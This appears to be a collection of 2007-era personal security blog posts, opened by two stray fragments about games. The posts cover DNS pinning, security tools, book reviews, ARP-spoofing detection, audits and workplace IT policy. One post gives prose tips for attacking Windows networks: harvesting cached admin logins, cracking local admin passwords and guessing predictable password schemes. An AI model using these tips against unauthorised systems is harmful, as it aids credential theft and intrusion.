[0] I have a 60 Warlock (main) and 60 Priest on Crushridge Alliance, and a 55 Shaman on Kul'Tiras Alliance. Obviously I've focused on the Shammy since BC.
[1] Aimbots in Quake 1 (yes, some people earned money using them); farm bots in Diablo II/Battlenet.

Christian Matthies has posted up an explanation of DNS Pinning attacks. While this article is really cool and informative, there are a couple of caveats.

First, this is a great article for people who already are familiar with DNS Pinning, since the author really throws out "Anti DNS Pinning" and "DNS Pinning" quite a lot, and it gets confusing which one he is actually talking about in each example. DNS Pinning is a behavior of a web browser to cache DNS requests until the window (or all windows of that browser) are closed. Any admin supporting DNS or web servers has experienced this behavior. "That should work...did you hit refresh? Oh wait, close all your browser first and retry. Yup that did it!" Christian then explains a way to get around DNS Pinning so an attacker can redirect users without their knowledge by leveraging browser behavior and changes to DNS entries.

Second, while several web security researchers would like to say this is a Big Deal, I consider this an exotic attack, yet. Christian mentions this can be used to attack internal servers, but that requires significant knowledge, and I don't think most corporations will have to care. Still, there is always the potential for something like this to become a common attack method in the future.

The takeaways for this is to know what DNS Pinning means, what Anti DNS Pinning means, and that there is still a grey area firmly between network and web security when it comes to DNS manipulation.

A few days ago I mentioned ddos mitigation. The referenced article [pdf] concerns UFIRT's actions in the face of a rather unique incident: a DDOS attack planned to occur in 1 week's time. Incident Response plans are important to a company's security posture, but not every imaginable incident needs to have an itemized response plan. And while issues like a DDOS likely should not be painstakingly planned out, it should at least be contemplated now and then as a sort of verbal/introspective exercise. What would you do in such a situation? Do you have extra resources, gear, or skills on your team to deal with an adhoc incident like a DDOS? Do you know where to turn for help on short notice? Can you pull a Joe Stewart out of your back pocket? :) It might be a useful exercise for an IR team, or just for a manager or techie to sit back and think about some lazy afternoon...

I've been ramping up my studying lately, which has taken some time away from blogging (both reading them and writing some). I've also made headway into my huge list of "pending" items that both sit on my bathroom counter and in my email box.

But I have found time to plug away at some more books. I've (finally!) started reading Tao of Network Security by Richard Bejtlich. I've put this book off way too long (I wanted more background into TCP/IP and Linux before tackling the book, or so I tell myself) and am finally getting into it. I really dig the tone and how Bejtlich presents the topics. Thankfully, the very academic first chapters were followed-up by excellent later chapters that I found much more interesting (maybe because I already knew his positions and definitions from following his blog).

Last night I also started reading Security Metrics by Andrew Jaquith. I really dig this guy's writing, and I was amazed by the opening tones of the book. First an opening by one of the most recognizable writing styles in security, Dan Geer, which is also visionary and almost prophetic. Just reading anything he writes feels weighty; old and dustry like an important magical tome hidden in some wizard's tower. Then into Jaquith's wonderful presentations. I think this book will go fast.

Yes, I read multiple books at once. Sometimes I read novels which just require me and a chair. Other times technical books that pretty much require a computer nearby to follow along. I typically have two or three going at any given time, depending on my mood and the resources nearby. It is usually too much to be reading 2 hands-on books at a time, so I try to keep it mixed up with different flavors of books.

Use Snort either on an active link or as a packet inspection tool after the fact? It might be useful to throw down PE Hunter to capture Windows binaries as they pass by. I can think of plenty of uses for this, not just in front of a honeypot, but in front of Internet-facing servers themselves. This is one of those detective tools that won't necessarily stop or prevent an attack, but can act as a watchguard for something evul going on, or to figure out what an attacker may have done on your network. The real usefulness of this tool won't be realized until it is used though. Who knows, maybe it will pick up too much junk from malware or software downloads and miss too much other stuff.

Of note, no, I'm not all that great with Snort. It's on my medium-term project list, probably nearer the fall or winter before I can really dig my fingers into Snort more, even though I may have my own Snort box up in the next month or so just to get it up and familiarized.

About half a year ago I posted about Untangle (and it has remained on my long-term projects list, sadly). I see they got some more press in ComputerWorld as they have turned their product open source. Sounds cool, and I still want to check it out on my home network someday (yeah, one of those projects that keeps getting pushed down...).

People often ask me how I like my Razr phone. I tell them it'd be a really nice phone...if I wasn't on Verizon. Yes, Verizon is well known for crippling their Razr's to the point where I really do only use it for phone calls and the occassional text message. In the past I have done minor adjustments like getting my own ringtones on the phone (text yourself a .wav file renamed to .mp3 and it will let it through, and play it as a .wav file properly) I've never delved too deeply into messing with it, being my first personally-owned cell phone. John Ward over at The Digital Voice has posted an awesome article about hacking the Razr, and he suffered from the same crippling issues from Verizon that I do. Since my contract is quite mature now and I'm more comfortable with pushing the line on my phone, I think I will make a note to try this stuff out. He's truly right that if I can unlock all this stuff in the article, the phone will take on a whole new level of use in my life. Funny how Verizon doesn't get that...

I've been going over some of the pending things in my todo lists. Here's a few things.

I don't know of anything that can browse shares in Gnome on Ubuntu (Nautilus can using smb:\\server\share, but that requires knowing your target). So I installed smb4k which is available through Synaptic. Seems I needed a bunch of other stuff, including kdelibs. While smb4k is a KDE tool, it seems to run just fine in Gnome. It can be loaded from Applications->Accessories. The initial load will throw a non-terminating KWallet error, but then happily disables itself and continues. One bonus is the ability to manage and see existing mounts.

If you see a system but aren't sure what OS it might be (if Windows, then you can try those fun admin shares!), you can check it out using an OS fingerprint tool. Yes, nmap and p0f are your typical choices, but SinFP might be a third option. I decided to try this on Windows and followed the instructions given. Everything seemed fine, but when I tried to fingerprint anything on my network, I typically was told I cannot fingerprint a closed or filtered port, even though I know it was open and allowed. Most of the time perl.exe would then spin and I'd have to kill it. Not sure what was going on, but might revisit it at some later date on Linux, perhaps. Regardless of the results of this tool, being able to know some of the differences that operating systems display in various packets and other behavior is some pretty fundamental and "not difficult" stuff. Being written in perl, it might be nice to read through this tool's signatures and techniques.

XAMPP looks like a nice way to get a full compliment of tools and applications for a web server set up quickly on either Linux or Windows (or others!). I've not tried this out as I wanted to do stuff manually with my latest build, but I might consider XAMPP in the future.

Here is a snippet of a Dan Kaminsky presentation on SSL Hell at Toorcon. He talks about the bad things he has found about SSL through his huge scans of the Internet. I really dig that he admits security people can be wrong when trying to require SSL on every page. SSL can be intensive on servers and the hardware doesn't scale well with it. One thing I didn't like is a minor quibble. He points out that a lot of sites don't appear to use SSL (https) on their logins, but I'd like if he just said, "I sniffed this transaction to verify it wasn't secured underneath what I can see in my browser." He's probably correct in saying they were insecure, however.

I can't remember where I found this originally, but I wanted to document it on my site for future reference. This reg script should add the ability to right-click any Windows folder and launch a cmd prompt at that location. Update: Looks like I maybe found it here.

REGEDIT4

[HKEY_CLASSES_ROOT\Directory\shell\DosHere]
@="Command &Prompt:"

[HKEY_CLASSES_ROOT\Directory\shell\DosHere\command]
@="C:\\windows\\SYSTEM32\\cmd.exe /k cd \"%1\""

[HKEY_CLASSES_ROOT\Drive\shell\DosHere]
@="DOS &Prompt Here"

[HKEY_CLASSES_ROOT\Drive\shell\DosHere\command]
@="C:\\windows\\SYSTEM32\\cmd.exe /k cd \"%1\""

There are a ton of different tools and ways to change your MAC address, let alone simply doing it manually. Here's a few I've accumulated notes about over the past 6 months. Macshift is a standalone C++ tool run via the command line. Does what it should do!

Technitium is probably the Mercedes of mac changers, sporting tons of information in the GUI and also being scriptable.

Smac is also a old favorite I see mentioned a lot, but the eval version is slightly limited. For such a small tool, I just don't believe in shelling out money for it.

Speaking of Windows tools, Wirelesskeyview is a quick .exe (no installation required) that will pull out wireless network keys and display them for you. I'm sure these are just stored in a registry entry somewhere and, if encrypted at all, are like just rot13, but still this tool makes life easy.

Heck, I'll stick with Windows for this whole post. The Windows firewall is still daunting to manage or maintain for most people, even those of us who are comfortable with firewalls! This kb article from Microsoft is surprisingly detailed. I especially like the last section on enabling and checking the logging of dropped packets. Combine this with a tail program and it might turn a spare WinXP box into a network tripwire-like device.

Yesterday I posted a few OS fingerprinting tools. I missed one I had in my box called Satori. This looks like a quick effort that may not be regularly updated, but is a passive OS fingerprinter for a few OS types. I've not had a chance to try this out yet as my Windows machines at home are limited, but it might be fun to try, even if it doesn't make any toolboxes. A related paper on the site is also interesting.

If you don't live on the Internet like I do, you might not know Sysinternals was "bought" by Microsoft (I'm not sure if it was actually bought or if Mark Russinovich just brought it along when he was hired by Microsoft). Now, you might know that, but did you know all those tools are offered in a single download now? Of particular note is ProcessMonitor which is a souped up version of Filemon/Regmon/ProcessExplorer. And if you don't know what Sysinternals is, well, I can't help you.

Let's stick some more with Windows tools. A few years ago it became hip to wow friends and family with tools that would undelete or recover files long through gone from hard disks. This led to the eventual realization that old computers given away and drives lost or stolen could yield a lot of data if not properly wiped. If you ask me, if there is any doubt about a whether a drive's contents are sensitive or not, just destroy the drive when it is decommission. (Besides, the powerful magnets inside the drives when disassembled make for fun toys for most anyone, if you want to score some points.)

Anyway, FreeUndelete is a tool to recover files. Also, the oldie tool Restoration is still available for the same purpose.

Oh, and PhotoRec is a tool to recover files from flash drives (and I bet other things!). This was described very well in an article on InformIT.

You can use Eraser as a tool to better wipe files from a Windows system. Use it in conjunction with the recovery tools above to see the differences. For full disk wipes, I prefer the bootable DBAN disc.

Of course there are more tools! Here's a quick list I pulled from a mailing list:
OverWrite
SecureDelete
another Secure Delete
WipeDisk
AutoClave
Wipe (Linux)
and of course, shred for Linux, which should need no link.

Videos are kinda cool. There are a bunch of them at Security-Freak demonstrating various tools and research. Scroll to the bottom to get past some of the topical videos and see common security tools demonstrated.

Serapis and SecureVision released this web defacement video. This demonstrates how easy it can be to deface a website, especially after you become familiar with a particular method of attack. If you know an attack on the current phpBB version, for instance, the hard part is learning how to pull it off the first time. After that, downing 100 vulnerable instances is cake. I like this video, even though the music is maddeningly annoying. (Oh, and for anyone thinking about producing videos, I really don't like having to scroll up and down to see the whole screen...)

You can't go wrong with a good ol' BackTrack2 WEP cracking video. There's a number of them out there, and for some reason I just like seeing them.

This video doesn't load every time for me (Ubuntu+Firefox), but when it does, it gives a demonstration of finding and manipulating out an exploit.

And the MPack demonstration video. The size is small, but still illustrates how web attack toolkits have gained traction.

And, of course, I have other videos listed in the aptly named "videos" section on the left menu.

Note to self: use telnet for email more often than I do now, if nothing else then to just stay familiar with the syntax in a pinch.

A few years ago Microsoft started offering free shipped cds containing security updates. Sadly, they didn't do this very long, but the ability to update systems locally was a blessing for my previous job where we didn't image our systems quite as much as I wanted to. Now I see Heise Security has an article detailing some scripts to build offline ISOs of patches. If you're like me and oftimes prefer the path of least resistance, Microsoft offers downloads of DVD ISOs as well. Woulda thunk!

I have heard today that Google is planning to acquire Postini. Hopefully they don't change Postini too much, since I've been a happy camper with them in my current job. Normally I don't report news news, but just wanted to make a quick post. Of course, I've been very happy with email service from Google as well as Postini, so it seems like a pretty strong match.

Do you block IM at your company either via policy, via technical controls like firewall or web filters, or all of the above?

Are you sure you're blocking IM?

Let me remind you we're in what is gaggingly called the Web 2.0 years. Are you still certain about your answer?

I've mentioned Meebo.com in the past as a web-based way to connect to all your favorite IM services. Yikes, that's scary enough to block in the firewall and filters, right? Well, now you can plop little plugins into blog services like Blogspot that will allow you to chat away with a friend. This is only a small skip (the hop, step, and jump have already been done!) away from being able to use outbound and inbound IM from any arbitrary website that you control.

If you've not revisited the business cases for IM lately, you might want to do so and start realizing the IM is going to be as prevalent as cell phones (and phones in general) in our lives moving forward. There is little sense to fight that, but every sense to get your organization used to having a centralized IM system or centralized standards.

PS: Yes, I saw this traffic because my IPS flagged it for me, thankfully.

I've seen a few postings lately musing about the Google/Postini marriage. It must be nice to have such rich and fertile material to pore and yell and talk over; like giving a hyper dog a large chewy bone to keep them occupied for hours upon hours at end while you try to get things done... Anyway, this is in response more towards Hoff/beaker than others he references.

I don't think Google's plans are quite this grandiose (providing security, becoming an ASP-cum-ISP and providing some buzzword called "clean pipes..."), and I don't think they are going into security in itself, per se.

Postini's offerings and customers fit exactly into what Google wants to do with Gmail and now Google Apps. This means they house even more content; content very personally and professionally relevant to its users and customers. They leverage content for advertising, and so on, which is a nice side-effect to providing SaaS for small-medium companies (or maybe the vice-versa is true!).

Also, with Postini, they can control the upstream gateways for many other companies. So even if you don't let Google house your data over time, they can still scan it and gather content/information about you and your company to better leverage advertising and relevance.

Besides, what is "secure" in housing one's important data at a third party? I don't much care if it is wrapped in SSL or POPS. Yes, security is part of it, but it is just a bullet point to get companies to take them more seriously as an alternative to Exchange/Lotus Notes/ISP mail service.

I think, like people look at crimes, it is easy to take Google's plans way more complicated than they truly are. The simple answers are almost always the right ones, not the huge complex conspiracies that can be thought up. :)

PS: Providing "clean pipes" sounds awfully nice and altruistic to the rest of us, but come on. Google went public. In going public, Google went from being altruistic and "not evil" to being ultimately self-serving towards itself and its stakeholders. It will only do "clean pipes" if it can be "evil" behind the scenes and profit from it...but I don't see that truly happening unless they offer up widespread wireless access and then leech all that rich personal data from all of us...evil, really. But I don't see that happening, really either.

I'm not sure how real this interview is, but I really have zero reason to not buy it as real. Either way, an interesting insight into why "hackers/crackers" do what they do.

I like case studies. They're the real deal in comparison to the theoreticals of many articles. Neil Carpenter recently posted about web-borne malware that eventually led to lan arp poisoning and injection of iframes into web requests. This sort of stuff illustrates the new things we need to start thinking about when it comes to web security. A web attack against one user browser stupid sites stupidly can result in your whole LAN being victimized; the next step in onesy-twosy hijackings from web pages. What is really cool is Neil followed that post up with another one discussing how to detect arp attacks like this.

I had to take exception to his statement that "I'd also suspect that most IDS systems would catch this." That's correct, but I don't know of any IDS systems that would catch those and not throw hundreds of other false positives at the same time. It's common to intially tune an IDS to not detect ARP.

So what else can you do to provide always-on detection of spoofed arp? You could set up a script to sniff and parse out arp requests relating to your gateways. These should be finite and quite managable. Then whitelist out the combinations for your gateway. If you get different responses, flag and alert. This way you ignore all the other arps since they will likely be false positives anyway, and only alert on what you really care about: the gateway. I bet arpwatch or some other nix arp tools could be leveraged to assist in this.

It is also time to have every company look into some sort of proxy solution for web traffic. Even if it is not robust and does active filtering or stripping of malicious files, it should at least log what is being visited and when. Multiple attempts to site xyz/123.htm accompanying every other hit is a good indicator after-the-fact.

These sorts of blended attacks are nothing new, but it is somewhat new to have such attacks originate from the web browser, attack the network, and end with other web browsers. That's cool and scary at the same time.

I was forwarded a list of 10 reasons not to provide free tech support by a coworker this morning. Not sure where she got it, but a quick Google search yielded the blog article I linked to, even if that wasn't the original.

I've encountered most of these in my personal life at some point or other (even before I was interested in IT stuff!). I've even encountered some of these items on the job. People who ask personal tech questions outside of work are people just like those I work with. There are many times people at work ask business-related and non-business-related tech questions which get into these same pitfalls. I am particularly careful when managers and HR overtly ask or hint that they would like me to work on their troubled home systems. That's usually a lot to lose and very little to gain, and the odds are on the lose side.

Manage expectations of those making the requests. Always be honest and open about your capabilities and how bad a problem is for the requestor. Some things are just not fixable or the odds are really against it. We're not gods, and sometimes we really can't fix everything or recover everything.

Nonetheless, I still help out when I can, as I do like to learn and help others, even if it is largely pro-bono.

Seems this morning has ushered in a slew of spam and possibly malicious pdf and dat emails coming in. I take it this is pretty new this morning since neither Postini nor McAfee have any blockings yet, and I'm hoping they are just spam and not some more sinister. We're watching our inbound mail and have actually blocked all mail with attachments until we learn more. Days like this make me wish I didn't have tons of projects and things to do and more time for incident response. :)

It's been a busy week for vulnerabilities. Microsoft's normal round with server and client patches. Winpcap had a disclosure and update. Sun's Java. I just saw a Flash player disclosure on the FD mailing list. Even McAfee's ePO and Cisco's CallManager rang some up. It's one of those days that reminds me of a few things.

1) Make sure that if you don't have the abilities to update all your workstations quickly, get that base image updated with the newest packages and installs so you stop rolling out outdated systems. Befriend your image guy/girl and make sure they have time and are appreciated. Volunteer to be a tester for any pilot deploys.

2) Evaluate whether you need centralized Windows install/patch management like Altiris. Don't overlook the need for another body to be the Altiris expert, or to carve out significant time for someone to learn and manage it. It's not an install and forget app!

3) If you don't do either of these, well, at least be aware of what your vulnerabilities are and make plans to mitigate or attack these issues in the future.

4) And most importantly, to all the stay-at-home "IT admins" whose experience includes 5 years of their 1 office SOHO room and 7 years of IT journalism: "Go patch your shit. Come back to me after you're done, and start imagining doing that for 3,000 systems in 25 departments before cluttering my reader with the latest no-brainer 'best practices' that sound good on a dreamy sunny Saturday morning but have little basis in reality." (Yeah, I have a pet peeve right there, hehe...)

I have recently begun reading Andrew Jaquith's recent book called Security Metrics on, predictably, security metrics. Andrew runs the securitymetrics.org site and mailing list. So far I have been very intrigued by his approach from my standpoint of a technical guy who likely will one day be in IT/security management. Security metrics are an inevitability, so I might as well start thinking about it in my roles.

Early on I was pleased to see Andrew tackle the problem of data sharing. It's one of those things I firmly believe is holding us back, and illustrates our problems (and stigmas) with sharing useful information with each other. If you know where I work, I certainly can't be very open about a damaging incident at work, especially if people at work may read my writings. And so on.

I was also pleased to see him quickly tackle the problems with ALE (Annualized Loss Expectancy) and expose it for the guesswork that it really is. Many people I've talked to have insinuated their disdain at something like trying to predict ALE, although few go far enough to outright challenge the general (read: CISSP) acceptance of it as gospel. Likewise, he put good solid wording to my own intuitions about scorecards, grades, and health colors, namely that they're ambiguous and don't mean anything. They're really meant to start discussions, not quickly show value.

I was surprised Andrew didn't use "pen-test" or "vuln assessment" terms when introducing his discussion on diagnostic measurements and hypotheses/subhypotheses. The method of answering diagnostic questions to prove or disprove a subhypothesis seems to be a vuln assessment to me.

One part that rubbed me slightly wrong was in the Perimeter Security and Threats section, under Attacks (pg 51-52). Andrew says, "You'll note that [this]...leaves out such common statistics as the most commonly attacked ports and the most 'dangerous' external URLs. I have omitted them deliberately, because they don't pass the 'So what?' test." I'm a bit in Bejtlich's camp when it comes to measuring and knowing your threats. Some of these measures such as top 10 ports, top 10 attacking addresses, and top 10 URLs help an organization know their threats (attackers) better. Granted, I also buy that Andrew is looking into organizational effectiveness and efficiency, and that view can still survive without looking to the external threats. Metrics paint a good picture of the past, but some measures like top 10 ports may indicate something happening right this moment that may be of some concern. Still, a minor point and not worth arguing about at all, as I accept both him and my stances as just a matter of opinion.

ICMP can be blocked or allowed, or one can instead allow the good stuff and block the unnecessary stuff. This paper should give the quick details on which is which. Gleaned from Shane Castle on the Security Catalyst forums.

Computer help questions come in many flavors, and while many requests get dodged, there are times when influential or attractive (wink wink) people ask favors that you don't want to dodge and would rather have a quick and impressive answer. One such situation involves the inevitable accidental file deletion or damaged disk recovery. Two such tools were recently posted to SearchWinComputing, Unstoppable Copier (gui) and Bad Block Copy (cli). There are other tools, but I've mentioned them elsewhere on here before (and recently too!). I'm sure there are other forensics tools that do this sort of stuff very nicely, but are likely cost-prohibitive for home users.

More fun web server tricks from Full-Disclosure today. Falling under the headings of "information disclosure" and "service fingerprinting" is an enabled server-status page in Apache. Go to your website and add "/server-status/" to the end to get the information, kinda like on apache's site: http://www.apache.org/server-status

This article about the government's opinion on P2P networks (they claim it is the cause of sensitive gov't data being disclosed and is thus evil) is exactly what I thought when I first heard this story today. The use of P2P networks and applications is not the issue here. The issue is data protection and system control. Don't let your organization-owned systems have P2P software on them (there are plenty of ways to tackle this both on the systems and the network!). And keep track of your data so people don't bring it home and put it on little Stacy's computer running 3 default all-shared P2P apps 24/7. Pound in that this activity is against policy. Stop slapping wrists and start meting out real punishments to the employees for such violations.

I've recently read two interested papers dealing with DNS-related attacks. First, Andrew Hay pointed over to a paper from the HoneyNet Project titled Know Your Enemy: Fast-Flux Service Networks. The HonetyNet Project is uniquely poised to do some things that most of us cannot autonomously do: monitor and trend threats. This position has allowed them to see Fast-Flux attacks first-hand, where DNS entries are changed dynamically to hide the source of malware downloads and controls. I'd be willing to bet this concept has been in use for quite some time, only many researchers fire off one or two lookups, report to the resulting domains, and that's it. They likely never see the changes, and thus never realized they were not really doing much good.

I also see that Trusteer has a paper hosted describing cache poisoning against BIND 9 by leveraging predictable transaction IDs to update DNS caching servers surrepticiously. While this seems a bit exotic, I wouldn't consider it too exotic. In fact, getting an outbound connection by an internal user shouldn't be a huge problem, and that could be a big payoff if you can poison some major DNS entries. I think the biggest problem is just making sure you're attacking a BIND 9 DNS caching server. I'll dive into this paper more than my casual glance tonight. Considering our malware prevalence today, I think this can be easily leveraged by existing maldoers, but may require a bit more targeting than blanket blind malware. I'm interested if the paper goes into countermeasures or how to combat this.

Lastly, this paper hosted by InfosecWriters is an excellent primer on DNS and DNS security. I recently read a DNS paper that was really well written, and I think this was it. I'm not sure where I got the link from, however.

A quick note that Marcin has posted an interview with Richard Bejtlich over on his blog, ts/sci-security. Richard hosts what is definitely one of my favorite blogs, writes excellent books, and basically is one of those zen masters of his field of expertise, namely network monitoring and everything that goes into that discipline. Of all the people I would love to learn from and work side-by-side with for a few years to sponge up information, he's near the top of the list, truly. I'd even fetch his coffee, give him massages, and frollic...er...someone stop this downward spiral..!

Reading the Bejtlich interview sparked a thought. I read this in response to what makes a good network security analyst:

First, you need to want to beat the bad guys. If you are entering the security field because you heard a commercial on the radio advertising higher pay, you will not get far.

For some reason, this made me think of mention that Marcin made recently along with pdp about the movie Hackers and/or that old "hacking" culture that seems missing lately.

I need to give pdp proper kudos for coming out (hehe, read *that* link out of context why don't ya?) about the movie's influence on his life personally. There are few things more chic in digital security than bashing CISSP-holders, but bashing the movie Hackers is one of them. I love the movie for what it is, even if the details are dramatized heavily.

At any rate, pdp and Marcin are both (independently and cooperatively at the same time, I think) looking to revive a little bit of that curious innocence and culture that the hacking scene has seen slowly disappear. This sounds fun and cool, and while the industry, technology, and hackers-turned-professionals have largely matured, we can still have a hell of a lot of fun in our little geek circles and keep things immature and fun as a way to keep our lives from becoming overgrown with the burden of the daily IT/security overwork. Embrace your inner deviate, if not in action, at least in thought.

I think the bottom line is to just have enthusiastic, lifelong passion about this field. Live it, embrace it...but that last might be my hedonist side talking.

This article on Boeing and SOX is a pretty amazing example of how regulations affect the bottomline and the IT department. It also seems to illustrate how NOT to deal with audits, namely, treat them as a good thing, not just something to do to avoid a fine or bad news for the stakeholders. Once you start treating regulation and security like a bad step-father, you get auditors yelling at each other, overturning rulings by others, and otherwise get so much in-fighting that you paralyze yourself.

Of course, it is easy for me as an armchair quarterback to say these things, and I'm sure the problems are way deeper than I could imagine. So here are some choice quotes I pulled out that apply to this generalization as well as overall IT/security intermingling.

The level of rigor -- for example, documenting every single approval for a coding change -- was foreign to the get-things-done culture of Boeing's computer professionals.

This is foreign to many shops. In fact, in my two major jobs, both have struggled to some degree with change management both in coding and also the infrastructure side. This is weak everywhere in the "just get it done" mentality that all business is permeated with.

Senior managers said that compliance was always a top priority. But junior managers said they didn't have enough resources. Auditors said that the information technology department was too resistant to change. IT workers said that auditors kept changing their minds about what they wanted and were too eager to fail controls.

That age-old gap between levels of management living in different worlds, or just plain not listening or providing proper resources to get things done. No one is working together, and it really sounds like making money and getting things done is top priority, not security or the audit. If security was the top priority, these friction points wouldn't exist.

Either way, for all of us in IT and security, this is our reality and our balancing act. If you can't adapt and deal with not having enough resources for perfect security, you need a better line of work.

I just recently finished reading the excellent book, Security Metrics, Replacing Fear, Uncertainty, and Doubt, by Andrew Jaquith. Andrew has written a book, not that I would like to write someday, but a book about a topic that hasn't been written about before, and he certainly has something (many things!) to say about it.

In fact, I have to make mention of a phrase that toally made me happy to see, since I rarely get such literary enjoyment from technical texts. On page 118, we have this gem: "perfidious outsourcers pilfering proprietary secrets."

This book is definitely worthwhile for anyone who ever has to present security metrics as a part of their job. I would also recommend it for any security operations people who want to understand why some metrics should be gathered and how to better give your analysts and managers what they want. Likewise, any security operations people are likely the future analysts and managers anyway, so this makes for a very good early orientation to the important questions and how to appropriately answer them, let alone self-evaluate their own systems according to more appropriate metrics.

I have protection on my SSH ports, but I wouldn't mind more. Honestly, it can't really hurt. This article by Kevin van Zonneveld on adding brute force protection to iptables (and your Ubuntu install) to help secure your SSH is a welcome addition. Far too often I read tidbits like this that stop at the first step: adding the iptables rules, and leave out all this other good stuff that Kevin goes into, like rummaging in cron to clean up rules, persisting the rules, and so on. I plan on adding this to my server in the next few. Thanks Kevin!

As a side note, it's been over a year since I've been tinkering with iptables, so this will get me back on track as I've become rusty...

Here is a quick paper (notes) about pen-testing a Windows Active Directory network. While I do know this paper covers only the lowest-hanging fruit, it seems that all too often, these lowest-hanging fruit are the most common fruit found in the wild.

I will add to make sure and grab the cached logins on the workstations attacked as well. Often, systems cache the default last 10 accounts, which almost always includes at least one admin-type account from desktop support or the person who made the image in the first place.

If you crack the local admin password, don't just use it on other systems, but try to change obvious things in the password. If they're not the same across the department or even the company, often desktop support has some sort of predictable password scheme based on the computer name or user name or department. Heck, even I had a predictable one back when I did support, but you really had to work to guess it and I left plenty of red herrings laying around (like having the second half of the hash crack into a known word or just lower-case letters to throw off how complex the first half was...)

What better time to release a blog-inspiring IT security article in the Wall Street Journal than when half the crowd is in Vegas for the week? Yes, the WSJ posted 10 Things Your IT Department Won't Tell You, which really should be reworded, 10 Ways to Circumvent Your IT Department's Restrictions. Here are some notes of mine on the article as a whole.

A. The author needs to stress further that employees should look at their corporate policies and talk to their IT staff. Sometimes it just takes user interest to get management to look at legit technological solutions to the below problems, not workers sneaking around. I wonder if the WSJ wouldn't mind if its editors sent all their email to a third party service or stored their files online? It would just be nice if the author had constantly (or at least at the beginning) reminded readers that while this is all in good fun, they can be crossing policy lines.

B. The author implies, or rather nearly flat-out states, that these items are part of a rather strict and unfriendly IT security stance. This is really not so. Some things like blocking certain websites are done almost as much for saving bandwidth costs as anything, or to prevent such things as porn viewing which can create a hostile work environment. Other things like email size requirements can be an external limitation by the Internet infrastructure at large (i.e. your target's mail servers). Likewise, storage is cheap, but try telling that to senior management when the Exchange servers start complaining and buckling and backups take too long. Alleviating that means spending money. And often management figures that money is better saved and file sizes remain reasonable. IT security is not the only force here, but rather simple economics in the IT world. Really, often it comes down to treating everyone equally and costs.

C. Contrary to what every non-IT person seems to think, IT pros do not know everything or every piece of software. Limitations are often made so that we have a finite job description. Supporting every piece of software that even 50 users can install is frustrating and a drain on company money.

D. I don't like the feeling that the author's Risks sections are skewed to the POV of the user, and not the business as a whole and how dangerous some of these practices may be. Some are properly framed while others are not.

E. That all said, I think this is an important article. It illustrates the common pains our users (and we as well!!) have when it comes to the convergence of work, culture, technology, and social lives. Each of these pain points should be fixed by IT, or at least the policy behind them transparent to the constituents. Each of these should also be examined to see if, instead of benefiting the company and our employees as people, we're holding them back and trying in vain to stem the tides of culture and progress.

1. HOW TO SEND GIANT FILES - How many companies really do need to send giant files and don't have any sort of FTP/SFTP infrastructure? No, your baby pictures in bitmap format and 10 times as big as modern monitor resolutions do not count as a business case. I am saddened to see the author tell users to look for the IE lock symbol as reassurance of validity, and that a Verisign logo further ensures the identity of the site. No, that's not enough, sorry. Oh, and if an Adobe exec runs it, it is less likely to have security holes. Say what? Anyway, IT does need a plan for transferring large files anyway, so get one. Everyone, and I mean everyone, hits the attachment max at some point. Hell, even Gmail has a max; live with it.

2. HOW TO USE SOFTWARE THAT YOUR COMPANY WON'T LET YOU DOWNLOAD - This one really peeves me, because I've too often seen a) malware enter because someone wanted certain software, b) computers become unusable due to crappy software or incompatibilities with business software, and c) frustrated users who then frustrate IT because they MUST have some backwater POS software installed or they will quit, or something equally outlandish. The bane of all IT is having to support everyone's crap. Yes, I'm jaded on this point, but there is usually a process of requesting and approving software for use in the business. Good IT will log all executed software, and query on why they were run. And be aware of your company size. Small companies can likely get more software approved, but large or medium companies just cannot scale IT to support every little thing.

3. HOW TO VISIT THE WEB SITES YOUR COMPANY BLOCKS - First, web-based email is not innocuous. Second, if your company blocks these sites actively, your proxy calls will likely be logged as well. If you need a site opened up or something, ask your manager, HR, or IT. If it is Final Four season and you can't stream the first round games, well, sorry, but we can't bring the internet access to a crawl just to see a 15 seed get crushed by a 2 seed in a game that will be played regardless if you are watching or not. And no, you can't connect to GoToMyPC.

4. HOW TO CLEAR YOUR TRACKS ON YOUR WORK LAPTOP - I really like the author saying, "...don't use your work computer to do anything you wouldn't want your boss to know about." That's it in a nutshell right there; that should be everyone's personal policy.

5. HOW TO SEARCH FOR YOUR WORK DOCUMENTS FROM HOME - Ugh. Don't ask your IT admin to help you set up Google Desktop. Bad. Ask how you can get set up with a VPN connection from home that is secure and allows you access to your computer or a file store. The author stupidly says three things that he/she should have put together. "...top-secret financial information..." and "...search company keeps a copy of your documents on its own server..." and "...myriad state laws regulate how a company has to react when it loses private information..." If you play the "duh" game, you see that you might have to provide some answers why you are allowing top secret, possibly regulated, information to be stored on third-party servers. Good job.

6. HOW TO STORE WORK FILES ONLINE - Like web-based email services, thinking too much about this problem creates ulcers. Yes, I'd like to encourage my users to store their files on third party services, because then they can store megs and gigs of company data out there, then quit (or god forbid get fired), and leave the company with absolutely no means to recover, inventory, or secure that data. Brilliant. These services should be stopped via web filters and software install restrictions, let alone via policy. Oh, and kudos to the author to recommend USB and other portable devices in item #2, then calling them cumbersome in this one.

7. HOW TO KEEP YOUR PRIVACY WHEN USING WEB EMAIL - These "nifty tricks" can spell doom for compliance, if that is your company's game. Tracking this stuff is such a grey area it's sick. Honestly, I don't like my stuff logged for perusal by my manager or HR; I really am part of the generation whose social lives tend to revolve around electronic means. But I do prefer to have things logged just in case, from both my personal POV and from the company POV. We need to make sure our processes and actions are transparent so that employees don't think we're reading their IM/email logs to get juicy gossip details. Chances are not good for that happening, sadly.

8. HOW TO ACCESS YOUR WORK EMAIL REMOTELY WHEN YOUR COMPANY WON'T SPRING FOR A BLACKBERRY - Another ulcer about data free-flowing out the company door, but at least the author implores readers to talk to IT.

9. HOW TO ACCESS YOUR PERSONAL EMAIL ON YOUR BLACKBERRY - I don't see a huge problem with this, until you a) run that attachment...oops, that was a virus and screw things u, b) can't get it to work and ask IT in which case we'll tell you no and watch you closer, or c) email that really important client from...oops, your personal email hotjerkyboy69foru from hotmail. Explain that to your boss...

The last one is just a light-hearted gimme; a lame contrivance of journalistic levity.

In the end, all of this comes down to a few protections by IT that can make a lot of these issues be blocked properly:
i. software restrictions based on policy and technology, including executable logging
ii. web filtering, or at least logging if not outright blocking
iii. data privacy/sensitivity training and strict adherence to least privilege access rights, better yet, full logging of all data downloaded/viewed, but good luck with that
iv. work with your users to overcome these challenges and find a happy middle ground

